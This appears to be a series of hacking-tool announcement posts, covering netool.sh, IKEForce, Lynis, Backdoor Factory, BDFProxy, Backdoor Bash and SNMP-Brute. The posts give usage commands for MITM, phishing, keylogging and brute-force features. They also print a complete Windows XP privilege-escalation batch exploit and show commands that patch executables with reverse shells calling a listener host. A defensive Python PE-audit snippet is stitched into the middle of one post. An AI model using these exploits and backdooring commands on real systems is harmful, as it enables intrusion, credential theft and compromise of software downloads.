Channel: Bash Script – Security List Network™

Update script bash NETOOL.sh stable Version-4.2


[netool.sh V4.2]
* netool.sh => “added” INURLBR (webcrawler.php by cleiton)
* netool.sh => “added” ‘toolkit_config’ file (config settings in toolkit)
* netool.sh => “added” set variable for temp download folder (/tmp/evil)
* netool.sh => “Improved” toolkit update check function [GIT repo]
* netool.sh => “Improved” SET_AUTO_START_UPDATES (toolkit_config)
* netool.sh => “Improved” script display output [Text User Interface]
* netool.sh => “removed” dd0s javascript attack (ubuntuone website)
* priv8.sh => “added” ‘host a file attack’ automated exploit
* priv8.sh => “added” meterpreter powershell invocation payload [by R3L1K]
* priv8.sh => “Improved” script display output [Text User Interface]
* priv8.sh => “Improved” ‘webshell.php’ payload
* priv8.sh => “Improved” ‘firefox_xpi_bootstrapped_addon’
(added JavaScript AlertBox to phishing webpage).

netool.sh is a bash script that automates frameworks such as Nmap, Driftnet, SSLstrip and ettercap MITM attacks.
It makes tasks such as sniffing, MITM, SSL sniffing, metadata retrieval and DoS attacks inside the local network easy; it can also manipulate TCP/UDP packets using etter.filters, capture pictures from web browsing on the target machine under MITM attack, and perform a vulnerability scan of a target website using the websecurify addon…


Features

  • ping target
  • Show Local Connections
  • Show my Ip address
  • Scan Local network
  • Scan remote host
  • execute Nmap command
  • Open router config
  • Ip tracer whois
  • WebCrawler
  • DDoS java Script
  • Retrieve metadata
  • Config ettercap
  • Launch MITM
  • show URLs visited
  • Sniff remote pics
  • Sniff SSL passwords
  • Dns-Spoofing
  • DoS attack {local}
  • Compile etter.filters
  • execute ettercap filter

d. delete lock folders
q. quit


INSTALL ON LINUX
1. extract "opensource.tar.gz" to your home folder
2. set execute permissions:
sudo chmod +x opensource/netool.sh
sudo chmod +x opensource/sslstrip-0.9/sslstrip.py
sudo chmod +x opensource/sslstrip-0.9/setup.py
3. install the following dependencies:
sudo apt-get install nmap
sudo apt-get install zenmap
sudo apt-get install ettercap
sudo apt-get install ettercap-gtk
sudo apt-get install driftnet
{or run the script with sudo to auto-install the dependencies}
example: sudo opensource/netool.sh
run netool.sh:
sudo opensource/netool.sh

INSTALL ON BACKTRACK
1. extract "opensource.tar.gz" to your home folder
2. set execute permissions:
chmod +x opensource/netool.sh
chmod +x opensource/sslstrip-0.9/sslstrip.py
chmod +x opensource/sslstrip-0.9/setup.py
config netool.sh:
edit the netool.sh script, look for the right paths where the frameworks
are installed and replace the paths with the right ones…
(open a terminal, run "locate zenmap", copy the path and replace it in the script)
Path to installations
(replace these paths with the right ones)
find="/usr/share/zenmap"
find2="/usr/share/ettercap"
confE="/etc/etter.conf"
confD="/usr/share/ettercap/etter.dns"
confP="/usr/share/ettercap/etter.services"
confW="/usr/share/doc/driftnet"
run netool.sh:
opensource/netool.sh


Download : opensource.tar.gz (20.1MB) Kali Linux : opensource[Kali].tar.gz (96.8kB)

Read more in here :  http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
Our post before : http://seclist.us/update-script-bash-netool-sh-v-4-0.html


IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.


IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities. Requires the pyip, crypto and openssl modules installed, but other than that it’s only standard libs.

INSTALL:
pyip is the only non-standard lib that you won't already have; install it with 'pip install pyip'

USAGE:
./ikeforce.py [target] [mode] -w /path-to/wordlist.txt [optional] -t 5 1 1 2
Example (enum mode):
./ikeforce.py 192.168.1.110 -e -w groupnames.txt -s 1
Example (brute mode):
./ikeforce.py 192.168.1.110 -b -i groupid -u dan -k psk123 -w groupnames.txt -s 1

Options:
-h, --help            show this help message and exit
-w WORDLIST, --wordlist=WORDLIST
                      Path to wordlist file
-t TRANS, --trans=TRANS
                      [OPTIONAL] Transform set: encryption type, hash type, authentication type, dh group (5 1 1 2)
-e, --enum            Set Enumeration Mode
-b, --brute           Set XAUTH Brute Force Mode
-k PSK, --psk=PSK     Pre Shared Key to be used with Brute Force Mode
-i ID, --id=ID        ID or group name. To be used with Brute Force Mode
-u USERNAME, --username=USERNAME
                      XAUTH username to be used with Brute Force Mode
-U USERLIST, --userlist=USERLIST
                      [OPTIONAL] XAUTH username list to be used with Brute Force Mode
-p PASSWORD, --password=PASSWORD
                      XAUTH password to be used with Connect Mode
--sport=SPORT         Source port to use, default is 500
-d, --debug           Set debug on
-c, --connect         Set Connect Mode (test a connection)
-y IDTYPE, --idtype=IDTYPE
                      [OPTIONAL] ID Type for Identification payload. Default is 2 (FQDN)
-s SPEED, --speed=SPEED
                      [OPTIONAL] Speed of guessing attempts. A numerical value between 1 - 5 where 1 is faster and 5 is slow. Default is 3
-l KEYLEN, --keylen=KEYLEN
                      [OPTIONAL] Key Length, for use with AES encryption types
TO DO:
- add rsa, hybrid etc support
- edit the packet processing to be more specific to milestones instead of just going by the number of packets in the received box
- add RADIUS support and add exception for OTP until it's supported
- add multiple transform sets to first packet to catch more device responses, particularly fqdn_user_id (03) and fqdn (02)
- add xauth brute force mode for watchguard devices, currently doesn't work

Download : ikeforce-master.zip (25.7 MB) 
or clone desktop : https://github.com/SpiderLabs/ikeforce.git
Source : Spiderlabs 

Updates Lynis v-1.6.3 : is a system and security auditing tool for Unix/Linux.


Changelog v-1.6.3 :
New:
– Added tests for Shellshock bash vulnerability [SHLL-6290]
– Added test to determine if Snoopy is used [ACCT-9636]
– New test for qdaemon configuration file [PRNT-2416]
– Test for GRUB boot loader password [BOOT-5122]
– New test for qdaemon printer jobs [PRNT-2420]
– Added ClamXav test for Mac OS X [MALW-3288]
– Gentoo vulnerable packages test [PKGS-7393]
– New test for qdaemon status [PRNT-2418]
– Gentoo package listing [PKGS-7304]
– Running Lynis without root permissions will start non-privileged scan
– Systemd service and timer example file added
– Added grub2-install to binaries

Changes:
– Adjustments so insecure SSL protocols are detected in nginx config [HTTP-6710]
– Directories will be skipped when searching for nginx log files [HTTP-6720]
– Only gather unique name servers from /etc/resolv.conf [NAME-2704]
– Properly detect mod_evasive on Gentoo and others [HTTP-6640]
– Improved swap partition detection in /etc/fstab [FILE-6336]
– Improvements to kernel detection (e.g. Gentoo) [KRNL-5830]
– Test for built-in security options in YUM [PKGS-7386]
– Improved boot loader detection for GRUB2 [BOOT-5121]
– Split GRUB test into two tests [BOOT-5122]
– Added Mac OS uptime check [BOOT-5202]
– Improved GetHostID function for systems having only ip binary
– Improved testing for symlinked binary directories
– Minor adjustments to log output
– Renamed dev directory to extras

Lynis is a system and security auditing tool for Unix/Linux. The main audience of this tool is security consultants, auditors and system administrators. This tool performs a security audit of the system and determines how well it is hardened. Any detected security issues are reported in the form of a suggestion or warning at the end of the audit. Besides security-related information it also scans for general system information, installed packages and possible configuration errors. This software aims to assist with automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read-only storage is possible (USB stick, cd/dvd).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits by automating control testing.

Features :

  • System auditing
  • Hardening suggestions
  • Security scan
  • Vulnerability scan

Download Latest Version : lynis-1.6.3.tar.gz (169.9 kB) 
Source : http://cisofy.com/
Our Post Before : http://seclist.us/lynis-v-1-5-9-released-is-a-system-and-security-auditing-tool-for-unixlinux.html

Update script bash NETOOL.sh stable Version-4.3


Changelog netool.sh v-4.3:
* INSTALL.sh => “added” installer of netool.sh toolkit
* netool.sh => “improved” running scanner inurlbr.php from toolkit
* netool.sh => “improved” better displays and small bugs fixed
* netool.sh => “added” MIGRATE_TO:wininit.exe “toolkit_config file”. Using the option ‘post-exploitation’ in the rootsector module, we now have the ability to choose a process to migrate to.
* priv8.sh => “improved” generate shellcode “new output -> shellcode.txt”
* priv8.sh => “Improved” host a file attack “added fake java update webpage”
* priv8.sh => “Improved” host a file attack “added fake missing plugin webpage”
* priv8.sh => “Improved” Website keylogger “no need to edit index.html”
* priv8.sh => “Improved” Clone WebSite > browser_autopwn “no need to edit index.html”
* priv8.sh => “Improved” Clone website > java_applet “no need to edit index.html”
* priv8.sh => “Improved” backdooring EXE files “keep template working”: keep the template working (executable), OR just use the icon (.ico) of the executable to be displayed in the generated backdoor.exe.

netool.sh is a bash script that automates frameworks such as Nmap, Driftnet, SSLstrip and ettercap MITM attacks.
It makes tasks such as sniffing, MITM, SSL sniffing, metadata retrieval and DoS attacks inside the local network easy; it can also manipulate TCP/UDP packets using etter.filters, capture pictures from web browsing on the target machine under MITM attack, and perform a vulnerability scan of a target website using the websecurify addon…


Features:

  • ping target
  • Show Local Connections
  • Show my Ip address
  • Scan Local network
  • Scan remote host
  • execute Nmap command
  • Open router config
  • Ip tracer whois
  • WebCrawler
  • DDoS java Script
  • Retrieve metadata
  • Config ettercap
  • Launch MITM
  • show URLs visited
  • Sniff remote pics
  • Sniff SSL passwords
  • Dns-Spoofing
  • DoS attack {local}
  • Compile etter.filters
  • execute ettercap filter

d. delete lock folders
q. quit

INSTALL ON LINUX
1. extract "opensource.tar.gz" to your home folder
2. set execute permissions:
sudo chmod +x opensource/netool.sh
sudo chmod +x opensource/sslstrip-0.9/sslstrip.py
sudo chmod +x opensource/sslstrip-0.9/setup.py
3. install the following dependencies:
sudo apt-get install nmap
sudo apt-get install zenmap
sudo apt-get install ettercap
sudo apt-get install ettercap-gtk
sudo apt-get install driftnet
{or run the script with sudo to auto-install the dependencies}
example: sudo opensource/netool.sh
run netool.sh:
sudo opensource/netool.sh

INSTALL ON BACKTRACK
1. extract "opensource.tar.gz" to your home folder
2. set execute permissions:
chmod +x opensource/netool.sh
chmod +x opensource/sslstrip-0.9/sslstrip.py
chmod +x opensource/sslstrip-0.9/setup.py
config netool.sh:
edit the netool.sh script, look for the right paths where the frameworks
are installed and replace the paths with the right ones…
(open a terminal, run "locate zenmap", copy the path and replace it in the script)
Path to installations
(replace these paths with the right ones)
find="/usr/share/zenmap"
find2="/usr/share/ettercap"
confE="/etc/etter.conf"
confD="/usr/share/ettercap/etter.dns"
confP="/usr/share/ettercap/etter.services"
confW="/usr/share/doc/driftnet"
run netool.sh:
opensource/netool.sh

Download : opensource.tar.gz (20.1MB) Kali Linux : opensource[Kali].tar.gz (20.1 MB)

Read more in here :  http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
Our post before : http://seclist.us/update-script-bash-netool-sh-stable-version-4-2.html

Updates Lynis v-1.6.4 : is a system and security auditing tool for Unix/Linux.


changelog v-1.6.4 :
New:
– Boot loader detection for AIX [BOOT-5102]
– Detection of getcap and lsvg binary
– Added filesystem_ext to report
– Detect rootsh
Changes:
– Hide errors when RPM database is faulty and show suggestion instead [PKGS-7308]
– Allow OpenBSD to gather information on listening network ports [NETW-3012]
– Don’t trigger warning for Shellshock when doing segfault test [SHLL-6290]
– Do not run Apache test on OpenBSD and strip control chars [HTTP-6624]
– Extended AIDE test with configuration validation test [FIND-4314]
– Improved Shellshock test regarding non-Linux support [SHLL-6290]
– Added support for gathering volume groups on AIX [FILE-6311]
– Properly parse PAM lines and add them to report [AUTH-9264]
– Support for boot loader detection on OpenBSD [BOOT-5159]
– Added uptime detection for OpenBSD systems [BOOT-5202]
– Support for volume groups on AIX [FILE-6312]
– Redirect errors when searching for readlink binary

Lynis is a system and security auditing tool for Unix/Linux. The main audience of this tool is security consultants, auditors and system administrators. This tool performs a security audit of the system and determines how well it is hardened. Any detected security issues are reported in the form of a suggestion or warning at the end of the audit. Besides security-related information it also scans for general system information, installed packages and possible configuration errors. This software aims to assist with automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read-only storage is possible (USB stick, cd/dvd).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits by automating control testing.

Features :
+ System auditing
+ Hardening suggestions
+ Security scan
+ Vulnerability scan

Download : lynis-1.6.4.tar.gz (172.0 kB)
Source : https://cisofy.com/
Our Post Before : http://seclist.us/updates-lynis-v-1-6-3-is-a-system-and-security-auditing-tool-for-unixlinux.html

Bash Script for Windows XP Local Privilege Escalation Exploit.


Windows XP Local Privilege Escalation Exploit. 

0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
0    ▄██████▄     ▄█    █▄     ▄██████▄     ▄████████     ███     ▄██   ▄                    0
1   ███    ███   ███    ███   ███    ███   ███    ███ ▀█████████▄ ███   ██▄                  1
0   ███    █▀    ███    ███   ███    ███   ███    █▀     ▀███▀▀██ ███▄▄▄███                  0
1  ▄███         ▄███▄▄▄▄███▄▄ ███    ███   ███            ███   ▀ ▀▀▀▀▀▀███                  1
0 ▀▀███ ████▄  ▀▀███▀▀▀▀███▀  ███    ███ ▀███████████     ███     ▄██   ███                  0
1   ███    ███   ███    ███   ███    ███          ███     ███     ███   ███                  1
0   ███    ███   ███    ███   ███    ███    ▄█    ███     ███     ███   ███                  0
1   ████████▀    ███    █▀     ▀██████▀   ▄████████▀     ▄████▀    ▀█████▀                   1
0                               im Gh0sty member Of 1337Day Algeria                          0
1--------------------------------------------------------------------------------------------0
0 Title           :  Windows XP Local Privilege Escalation Exploit                           1
1 Discovrer       :  Ghosty (0x9h027)                                                        0
0 Email           :  x31337666[at]gmail[dot]com                                              1
1 Facebook        :  https://facebook.com/0x9h027  (Subscribe Or PM me Only)                 0
0 Home            :  Algeria 16023 ( Alger - Hydra )                                         1
1 Category        :  Proof Of Concept                                                        0
0 Tested    :  Windows XP SP1 , SP2 (FRENSH)                                                 1
1010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
// BATCH SCRIPT START HERE

@echo off
title Windows XP Local Privilege Escalation Exploit
color 0a
cls
cd / && cd windows/system32/
mkdir ghosty && copy logon.scr ghosty\logon.scr && copy cmd.exe ghosty\cmd.exe
del logon.scr && rename cmd.exe logon.scr
echo.
echo.
echo Activate Screensaver and wait for it
echo an Unprotected dos prompt will appear 
:: Gh0sty Grrr --- F-ck h4ck!n Luv 3xpl0!ting --- <3 <3 <3
:: short explanation
:: so in this script we back up cmd.exe (COMMAND PROMPT) & logon.scr (SCREENSAVER)
:: then we delete logon.scr and rename cmd.exe to logon.scr 
:: we set screensaver and wait for it the system (NT/AUTORITE) will look for screen saver file (logon.scr) but its cmd.exe
:: so he will execute cmd.exe with higher privilege :) so we can use this to get the administrator account 
:: ex:  net user [ADMIN_HERE] [PASS_HERE]

//SCRIPT END
	
ping~########################################################################################\
inject0rTEAM-ExploitiD-ExploitDB-an0nghost-an0nsec-an0nDZ-DZMAFIA-TEAM152                    #
Caddy-Tr0ooN-KedAnZ-KingOfPirates-backoverDZ-cc0de-foundZ-kha&m!x-El!teTr0jan                #
#############################################################################################/
#EOF

Source : http://pastebin.com/SBXFFaY6

The Backdoor Factory Proxy (BDFProxy) v0.2 released : Patch Binaries via MITM: BackdoorFactory + mitmProxy.


NOTICE : For security professionals and researchers only.
This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
And exit [Ctrl+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple, I modded a script put out by Hak5 to help you with configuration. Run ./wpBDF.sh and enter the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is forwarded normally.

Then:

./bdf_proxy.py

Here's some sweet ascii art for possible physical placements of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

 Testing : 

Suppose you want to test your setup by connecting through the proxy with Firefox and FoxyProxy.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually; things move fast and behind the scenes traffic is multi-threaded, but the initial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download version :
0.2.tar.gz (14 KB)
0.2.zip (14 KB) 

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

The Backdoor Factory (BDF) v-2.3.2 released : Patch PE, ELF, Mach-O binaries with shellcode.


NOTICE: For security professionals and researchers only.
Changelog 12/17/2014:
– OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
-B 15 -> set beacon time to 15 secs
– Bug fix to support OS X for BDFProxy

The goal of BDF is to patch executable binaries with user-desired shellcode and continue normal execution of the pre-patched state.

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependencies:
Capstone, using the 'next' repo until it is the 'master' repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory
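The log above shows two artifacts that this patching leaves in the output file: a non-code section has its flags changed to executable ("Changing Section Flags") and the Authenticode certificate table pointer is overwritten. The following Python is an added example, not code from BDF or from this post, that parses the PE section headers and the security data directory to flag both; the two in-memory PE images it checks are constructed header-only fixtures, not real executables, and the offsets used are those of the PE/COFF specification.

```python
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
CERT_TABLE_INDEX = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY (Authenticode signature)


def audit_pe(data):
    """Parse the PE headers in `data`; return section-flag findings and whether a
    certificate table (Authenticode signature) is still referenced."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    # Data directories start at +96 for PE32 (0x10b) and +112 for PE32+ (0x20b).
    dd_off = opt + (96 if magic == 0x10B else 112)
    _, cert_size = struct.unpack_from("<II", data, dd_off + 8 * CERT_TABLE_INDEX)

    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i  # section headers follow the optional header
        name, vsize, va, _, _, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, hdr)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "flags": flags})

    findings = []
    for s in sections:
        executable = bool(s["flags"] & IMAGE_SCN_MEM_EXECUTE)
        writable = bool(s["flags"] & IMAGE_SCN_MEM_WRITE)
        code = bool(s["flags"] & IMAGE_SCN_CNT_CODE)
        if executable and writable:
            findings.append(f"section {s['name']} is both writable and executable")
        if executable and not code:
            findings.append(f"non-code section {s['name']} is marked executable")
    # Sanity check: the entry point should land in a section flagged as code.
    entry_sec = next((s for s in sections if s["va"] <= entry < s["va"] + s["vsize"]), None)
    if entry_sec is None or not entry_sec["flags"] & IMAGE_SCN_CNT_CODE:
        findings.append(f"entry point 0x{entry:x} is not inside a code section")
    return {"signed": cert_size != 0, "sections": [s["name"] for s in sections], "findings": findings}


def build_pe(section_flags, cert_dir=(0, 0)):
    """Constructed fixture: a header-only PE32 image with the given (name, characteristics)
    sections and an optional certificate-table directory entry. Not a runnable program."""
    e_lfanew, opt_size = 0x80, 224
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_flags), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)      # AddressOfEntryPoint -> first section
    struct.pack_into("<H", opt, 92, 16)          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * CERT_TABLE_INDEX, *cert_dir)
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), 0x200, 0x1000 * (i + 1), 0x200, 0, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(section_flags))
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs


TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RSRC = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ

# Constructed "before" image: conventional flags and a certificate table present.
CLEAN_PE = build_pe([(".text", TEXT), (".data", DATA), (".rsrc", RSRC)], cert_dir=(0x5F200, 0x1E00))
# Constructed "after" image mimicking the two artifacts in the log above:
# .data made executable for the cave, certificate table pointer zeroed.
PATCHED_PE = build_pe([(".text", TEXT), (".data", DATA | IMAGE_SCN_MEM_EXECUTE), (".rsrc", RSRC)])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("patched", PATCHED_PE)):
        report = audit_pe(image)
        print(f"{label}: signed={report['signed']} findings={report['findings']}")
```

A missing certificate table is only meaningful for binaries that are normally signed (as Sysinternals tools are), so compare the report against a copy fetched over a trusted channel rather than treating it alone as proof of tampering.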

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Download :

the-backdoor-factory-2.3.2.tar.gz (55 KB)
the-backdoor-factory-2.3.2.zip (74 KB) 

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory



Updates Discover v-20.12.2014 – Custom bash scripts To automate various pentesting tasks.


changelog v-20.12.2014 :
+ Added more Nessus mappings.
+ Updated Burp notes.
+ new bash Script

Formerly BackTrack scripts. For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
Features :
– sslscan and sslyze to check for SSL/TLS certificate issues.
– Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple websites.
– Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.
– Crack wireless networks.
– Parse XML to CSV.
– Scan a CIDR, list, IP or domain.

Download, setup & usage :
If using Kali mini: apt-get install windows-binaries
git clone git://github.com/leebaird/discover.git /opt/discover/
All scripts must be run from this location.
cd /opt/discover/
./setup.sh
./discover.sh
Source : https://github.com/leebaird
our post : http://seclist.us/update-discover-v-22-9-14-formally-backtrack-scripts-for-use-with-kali-linux-custom-bash-scripts-used-to-automate-various-pentesting-tasks.html

Backdoor Bash : Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL.


Unix remote-shell backdoor developed with Bash, Netcat and OpenSSL (data encryption with AES-128)

The main goals of this project are to implement the attack scenario below:
+ Implement a remote-shell-style backdoor with Bash
+ Man-in-the-middle attack with Ettercap (e.g. ARP spoofing)
+ Host a backdoor installer
+ Automate data alteration to inject the backdoor into the target's computer via its browser
If the target (naively) runs the script (i.e. the backdoor installer) without reading the source code, the computer is infected and the attacker obtains remote command access
Detect and prevent this kind of attack with a NIDS tool such as Snort

Notice :
– The programming language was chosen only for a Proof of Concept (POC)
– The socket layer is handled by a portable version of Netcat. I compiled Netcat for the i686 and x86_64 architectures and put the binaries inside this project.
– The transmitted data is encrypted with AES-128 (without using Cryptocat). The data is encrypted on the fly via OpenSSL.

Requirements:
– openssl (tested with v1.0.1j)
– ettercap (>= v0.8.1)
– etterfilter (>= v0.8.1)
– netcat (the compiled version is “The GNU Netcat” v0.7.1)

How does it work?
The backdoor-client connection works locally and remotely (inside the same private network, behind the same access point); see “$HOST” inside “config.sh”.

It works only on Unix OSes. Currently tested only on:
– Archlinux
– Debian 7
– Ubuntu 14.10

Sample Test : 

git clone git@github.com:pilebones/backdoorBash.git
cd backdoorBash
cp config.sh.sample config.sh 
vim config.sh
./server.sh
./client.sh

Download :

etterfilterSamples : Master.zip  | or Clone Url 

Backdoor bash : Master.zip  | or Clone Url
Source : https://github.com/pilebones

SNMP-Brute : Fast SNMP brute force, enumeration, CISCO config downloader and password cracking script.


SNMP brute force, enumeration, CISCO config downloader and password cracking script. Listens for any responses to the brute force community strings, effectively minimising wait time.

Features:
+ Brute forces both version 1 and version 2c SNMP community strings
+ Enumerates information for CISCO devices or if specified for Linux and Windows operating systems.
+ Identifies RW community strings
+ Tries to download the router config (metasploit module).
+ If the CISCO config file is downloaded, shows the plaintext passwords (metasploit module) and tries to crack hashed passwords with John the Ripper

Requirements :
– metasploit
– snmpwalk
– snmpstat
– john the ripper

Usage :
python snmp-brute.py -t [IP]

Options :
--help, -h                       show this help message and exit
--file=DICTIONARY, -f DICTIONARY Dictionary file
--target=IP, -t IP               Host IP
--port=PORT, -p PORT             SNMP port

Advanced :
--rate=RATE, -r RATE             Send rate
--timeout=TIMEOUT                Wait time for UDP response (in seconds)
--delay=DELAY                    Wait time after all packets are sent (in seconds)
--iplist=LFILE                   IP list file
